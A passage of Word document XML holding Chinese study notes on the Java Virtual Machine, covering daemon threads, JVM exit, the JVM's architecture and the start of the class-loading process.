          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>内部有两种线程：守护线程和非守护线程，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>属于非守护线程，守护线程通常由</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>自己使用，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>程序也可以标明自己创建的线程是守护线程</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="701"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>c)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>消亡。当程序中的所有非守护线程都终止时，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>才退出；若安全管理器允许，程序也可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Runtime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>System.exit()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来退出</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>执行引擎实例则对应了属于用户运行程序的线程它是线程级别的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="125" w:beforeAutospacing="0" w:after="125" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>二、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的体系结构</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类装载器（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>）（用来装载</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.class</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>文件）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>执行引擎（执行字节码，或者执行本地方法）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>运行时数据区（方法区、堆、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>栈、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>PC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>寄存器、本地方法栈）</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="351"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>三、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>类加载器</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Style w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>整个类加载过程的步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t>      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="微软雅黑" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="404040"/>
          <w:sz w:val="11"/>
          <w:szCs w:val="11"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>装载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:firstLine="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>装载过程负责找到二进制字节码并加载至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>通过类名、类所在的包名通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>来完成类的加载，同样，也采用以上三个元素来标识一个被加载了的类：类名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+</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Fonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>包名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>+ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F27C8D" w:rsidRDefault="00F27C8D" w:rsidP="00F27C8D">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="316" w:lineRule="atLeast"/>
        <w:ind w:left="301"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="404040"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="a9"/>
